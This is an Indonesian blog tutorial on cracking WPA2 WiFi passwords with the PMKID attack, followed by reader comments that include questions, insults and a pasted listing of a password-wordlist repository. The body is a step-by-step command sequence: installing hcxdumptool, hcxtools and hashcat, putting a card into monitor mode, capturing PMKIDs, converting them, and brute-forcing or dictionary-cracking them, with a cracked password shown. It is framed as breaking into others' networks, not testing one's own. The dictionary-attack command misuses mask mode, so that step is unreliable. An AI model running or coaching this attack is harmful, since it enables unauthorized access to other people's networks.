Tutorial Hack WiFi: Cracking Password WPA2 dengan PMKID Attack. Metode cracking WPA2 saat ini lebih mudah setelah ditemukannya teknik PMKID attack dimana kita tidak lagi membutuhkan proses handshake dari jaringan WiFi yang ingin diserang. Itu artinya bahkan meskipun di SSID tersebut sedang tidak ada yang login, kalian tetap bisa melakukan dump PMKID dari router yang menggunakan keamanan WPA2, yang kemudian kita bisa melakukan cracking dari informasi yang didapat tersebut.
Metode ini ditemukan oleh Jens ‘Atom’ Steube, orang dibalik tool cracking populer, Hashcat. Menurutnya, metode ini akan efektif terhadap hampir seluruh router yang menggunakan jaringan 802.11i/p/q/r dengan fungsi roaming diaktifkan.
Oke pertama, kita install dependensi yang dibutuhkan terlebih dahulu.
sudo apt-get update sudo apt-get install git libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev
Selanjutnya install hcxtool
cd /tmp git clone https://github.com/ZerBea/hcxdumptool.git cd hcxdumptool make sudo make install
cd /tmp git clone https://github.com/ZerBea/hcxtools.git cd hcxtools make sudo make install
Selanjutnya adalah instalasi hashcat. Di distro pentest seperti Kali Linux atau BackBox, tool ini sudah ada di repository dan dapat diinstall menggunakan perintah
sudo apt-get update && sudo apt-get install hashcat
Namun jika kalian tidak menemukan hashcat di repository, kalian bisa download melalui link berikut:
https://github.com/hashcat/hashcat
Oke lanjut ke proses hack WiFi.
Masuk ke mode monitor terlebih dahulu. Sebelumnya, kalian periksa dulu nama interface network kalian dengan perintah
ifconfig
Oke, interface yang kita gunakan adalah wlan0. Masuk ke mode monitor dengan command
sudo airmon-ng check kill sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up
Sekarang kita gunakan hcxdumptool untuk menyerang PMKID dari SSID yang rentan.
sudo hcxdumptool -i wlan0 -o pwn.pcapng --enable_status=1
wlan0 adalah nama interface, pwn.pcapng adalah outputnya. Kalian sesuaikan sendiri.
Jika PMKID sudah ditemukan, kalian bisa hentikan proses dengan menekan Ctrl+ C.
Lanjut, kita convert file pcapng agar bisa dicrack menggunakan hashcat.
hcxpcaptool -z pwn.16800 pwn.pcapng
Terakhir adalah proses cracking menggunakan hashcat.
Di real case mungkin kalian bisa menggunakan brute force dengan mencoba seluruh kombinasi karakter 8 digit.
sudo hashcat -m 16800 pwn.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
Atau, kalian bisa juga menggunakan password list untuk melakukan dictionary attack. List password kalian bebas mau ambil darimana, namun rekomendasi saya adalah ini:
- https://github.com/danielmiessler/SecLists/tree/master/Passwords
Jika sudah didownload, jalankan command
sudo hashcat -m 16800 pwn.16800 -a 3 -w 3 --force 'wifi-password.txt'
wifi-password.txt adalah nama file berisi kumpulan password. Sesuaikan sendiri.
Output
d5fb59dc80f6c9db1aae2e8c1112bd31*0c3747bda154*60f67797ee0b*4152505553444f4b:44332211
Password WiFinya adalah 44332211.
Oke mungkin sekian tutorial singkat kali ini, semoga bermanfaat. Jika ada yang ingin ditanyakan silahkan tinggalkan komentar.
Lukman says
Apakah cara tersebut bisa juga digunakan dgn termux
kiryuu says
bisa
_reduce says
kyknya sih engga
Yoo Cherry says
gatau. coba aja. gw make laptop terus soalnya
Ivan hb says
Gak bisa gan ane udah coba.
ryoo says
bisa kamu harus install kali linux du termux kamu
Unknowm says
Ini pake aplikasi apa ??
Yoo Cherry says
kalo baca jangan judulnya doang babi
4R981 says
akwoakwoa literasi -100
Rusdi says
Ini buat win 7 32bit bisa ?
Anonym says
Hahaha
. says
Linux tolol, makanya kalo baca tuh jangan judul doang, babi
Heru says
Gagal terus ini pas step di “make”
Makefile20: recipe for target ‘build’ failed
gimana ya ini? saya pake ubuntu di windows 10 sih… mungkin gegara itu?
Yoo Cherry says
wsl gak akan bisa dipake lagian bro. wireless network interface nya gaada
Unknown says
Tolong bikin video nya donk… Saya masih awam
parjo says
gak ke detect apa gimana gan?
Yoo Cherry says
maksudnya gimana
Lexy says
Wkwkw ini sangat membantu
Raka says
Bang, boleh saya berguru pada Anda? Saya ingin juga
wiyan says
Izin download toolsnya
geng says
Common-Credentials find . -name ‘*_*’ -exec rename ‘s/_/-/g’ “{}” \; 8 months ago
Cracked-Hashes Quick rename of files 2 years ago
Default-Credentials Merge pull request #357 from govolution/patch-3 3 months ago
Honeypot-Captures 51k random creds obtained by running Heralding for two weeks in Sep/2019 3 months ago
Leaked-Databases Better filenames 8 months ago
Malware Close #291 – Fix encoding issues 8 months ago
Permutations rename ‘s/_/-/g’ 2 years ago
Software Close #291 – Fix encoding issues 8 months ago
WiFi-WPA Add “-” to split up words, moved files since PR accepted 2 years ago
Keyboard-Combinations.txt Add “-” to split up words, moved files since PR accepted 2 years ago
Most-Popular-Letter-Passes.txt Add “-” to split up words, moved files since PR accepted 2 years ago
PHP-Magic-Hashes.txt Adding sha256 magic hash 6 months ago
README.md removes exec. bits last year
SCRABBLE-hackerhouse.tgz Add scrabble 5 months ago
UserPassCombo-Jay.txt “Passwords/” Clean up 3 years ago
bt4-password.txt Close #291 – Fix encoding issues 8 months ago
cirt-default-passwords.txt Fix for #201 – \_ -> _ 2 years ago
clarkson-university-82.txt Quick rename of files 2 years ago
darkc0de.txt Close #291 – Fix encoding issues 8 months ago
darkweb2017-top10.txt Add “-” to split up words, moved files since PR accepted 2 years ago
darkweb2017-top100.txt Close #291 – Fix encoding issues 8 months ago
darkweb2017-top1000.txt Close #291 – Fix encoding issues 8 months ago
darkweb2017-top10000.txt Close #291 – Fix encoding issues 8 months ago
der-postillon.txt Add worlds-safest-password list by Der Postillon 9 months ago
dutch_wordlist Added dutchwordlist 3 months ago
mssql-passwords-nansh0u-guardicore.txt Add MSSQL from guardicore: labs_campaigns-Nansh0u 8 months ago
openwall.net-all.txt Close #291 – Fix encoding issues 8 months ago
probable-v2-top12000.txt Add “-” to split up words, moved files since PR accepted 2 years ago
probable-v2-top1575.txt Add “-” to split up words, moved files since PR accepted 2 years ago
probable-v2-top207.txt Add “-” to split up words, moved files since PR accepted 2 years ago
richelieu-french-top20000.txt Add richelieu 6 months ago
richelieu-french-top5000.txt Add richelieu 6 months ago
stupid-ones-in-production.txt Create stupid-ones-in-production.txt 5 months ago
twitter-banned.txt Added POTUS Twitter password 2 years ago
unkown-azul.txt Add “-” to split up words, moved files since PR accepted 2 years ago
url-to-download-passwords.md Close #154 – 1.4 billion password breach compilation wordlist 6 months ago
xato-net-10-million-passwords-10.txt Close #293 – Ten Million Passwords 8 months ago
xato-net-10-million-passwords-100.txt Close #293 – Ten Million Passwords 8 months ago
xato-net-10-million-passwords-1000.txt Close #293 – Ten Million Passwords 8 months ago
xato-net-10-million-passwords-10000.txt Close #293 – Ten Million Passwords 8 months ago
xato-net-10-million-passwords-100000.txt Close #291 – Fix encoding issues 8 months ago
xato-net-10-million-passwords-1000000.txt Close #291 – Fix encoding issues 8 months ago
xato-net-10-million-passwords-dup.txt Close #291 – Fix encoding issues 8 months ago
xato-net-10-million-passwords.txt Close #291 – Fix encoding issues 8 months ago
geng says
kan buka ini https://github.com/danielmiessler/SecLists/tree/master/Passwords
teru hasilnya ini:
=================================================================
Common-Credentials find . -name ‘*_*’ -exec rename ‘s/_/-/g’ “{}” \; 8 months ago
Cracked-Hashes Quick rename of files 2 years ago
Default-Credentials Merge pull request #357 from govolution/patch-3 3 months ago
Honeypot-Captures 51k random creds obtained by running Heralding for two weeks in Sep/2019 3 months ago
Leaked-Databases Better filenames 8 months ago
Malware Close #291 – Fix encoding issues 8 months ago
Permutations rename ‘s/_/-/g’ 2 years ago
Software Close #291 – Fix encoding issues 8 months ago
WiFi-WPA Add “-” to split up words, moved files since PR accepted 2 years ago
Keyboard-Combinations.txt Add “-” to split up words, moved files since PR accepted 2 years ago
Most-Popular-Letter-Passes.txt Add “-” to split up words, moved files since PR accepted 2 years ago
PHP-Magic-Hashes.txt Adding sha256 magic hash 6 months ago
README.md removes exec. bits last year
SCRABBLE-hackerhouse.tgz Add scrabble 5 months ago
UserPassCombo-Jay.txt “Passwords/” Clean up 3 years ago
bt4-password.txt Close #291 – Fix encoding issues 8 months ago
cirt-default-passwords.txt Fix for #201 – \_ -> _ 2 years ago
clarkson-university-82.txt Quick rename of files 2 years ago
darkc0de.txt Close #291 – Fix encoding issues 8 months ago
darkweb2017-top10.txt Add “-” to split up words, moved files since PR accepted 2 years ago
darkweb2017-top100.txt Close #291 – Fix encoding issues 8 months ago
darkweb2017-top1000.txt Close #291 – Fix encoding issues 8 months ago
darkweb2017-top10000.txt Close #291 – Fix encoding issues 8 months ago
der-postillon.txt Add worlds-safest-password list by Der Postillon 9 months ago
dutch_wordlist Added dutchwordlist 3 months ago
mssql-passwords-nansh0u-guardicore.txt Add MSSQL from guardicore: labs_campaigns-Nansh0u 8 months ago
openwall.net-all.txt Close #291 – Fix encoding issues 8 months ago
probable-v2-top12000.txt Add “-” to split up words, moved files since PR accepted 2 years ago
probable-v2-top1575.txt Add “-” to split up words, moved files since PR accepted 2 years ago
probable-v2-top207.txt Add “-” to split up words, moved files since PR accepted 2 years ago
richelieu-french-top20000.txt Add richelieu 6 months ago
richelieu-french-top5000.txt Add richelieu 6 months ago
stupid-ones-in-production.txt Create stupid-ones-in-production.txt 5 months ago
twitter-banned.txt Added POTUS Twitter password 2 years ago
unkown-azul.txt Add “-” to split up words, moved files since PR accepted 2 years ago
url-to-download-passwords.md Close #154 – 1.4 billion password breach compilation wordlist 6 months ago
xato-net-10-million-passwords-10.txt Close #293 – Ten Million Passwords 8 months ago
xato-net-10-million-passwords-100.txt Close #293 – Ten Million Passwords 8 months ago
xato-net-10-million-passwords-1000.txt Close #293 – Ten Million Passwords 8 months ago
xato-net-10-million-passwords-10000.txt Close #293 – Ten Million Passwords 8 months ago
xato-net-10-million-passwords-100000.txt Close #291 – Fix encoding issues 8 months ago
xato-net-10-million-passwords-1000000.txt Close #291 – Fix encoding issues 8 months ago
xato-net-10-million-passwords-dup.txt Close #291 – Fix encoding issues 8 months ago
xato-net-10-million-passwords.txt Close #291 – Fix encoding issues 8 months ago
===================================================================
nah yg di download yg mana? saya masih awam bgt, tolong pentujuknya
Thanks before
AERION says
gan kalau telnetnya filtered gimana solusinya
codot says
pas eksekusi,network lgsung ilang,so jadi gagal scan ssid
GFA says
hcxpcaptool -z pwn.16800 pwn.pcapng
16800 ini apa ya gan???
zakizuga says
crtgh ( FYI ) …..
gan ini link hcxtool nya sdh dihapus kah ?